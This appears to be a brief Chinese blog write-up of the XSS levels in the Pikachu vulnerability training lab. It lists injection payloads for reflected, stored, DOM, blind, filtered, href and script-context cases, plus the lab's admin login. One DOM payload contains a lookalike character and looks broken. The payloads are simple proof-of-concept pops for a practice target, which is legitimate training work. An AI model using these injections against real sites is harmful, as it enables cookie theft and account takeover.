Pikachu漏洞靶场 XSS(跨站脚本攻击)

XSS

关于xss的我也是一知半解,所以只放出payload来。

反射型xss(get)

修改maxlength属性之后提交如下内容:

<script>alert(/xss/);</script>

反射型xss(post)

登录之后提交如下内容:

<script>alert(document.cookie);</script>

存储型xss

提交如下内容:

<script>alert(/xss/);</script>

DOM型xss、xss-x

提交如下内容,鼠标点击a标签时就会弹窗。

#' οnclick=alert(/xss/)>

xss之盲打

在xss_blind.php提交如下内容:

<script>alert(/xss/);</script>

然后进入后台admin_login.php,admin,123456登录

进入后台就会弹窗。

xss之过滤

提交如下内容就会弹窗:

<img src=# onerror=alert(/xss/)>

XSS之htmlspecialchars、xss之href输出

提交如下内容,点击a标签就会弹窗:

javascript:alert(/xss/)

xss之js输出

提交如下内容闭合script标签即可弹窗:

</script><script>alert(/xss/)</script>
posted @ 2022-04-24 22:22  CVE-柠檬i  阅读(179)  评论(0)    收藏  举报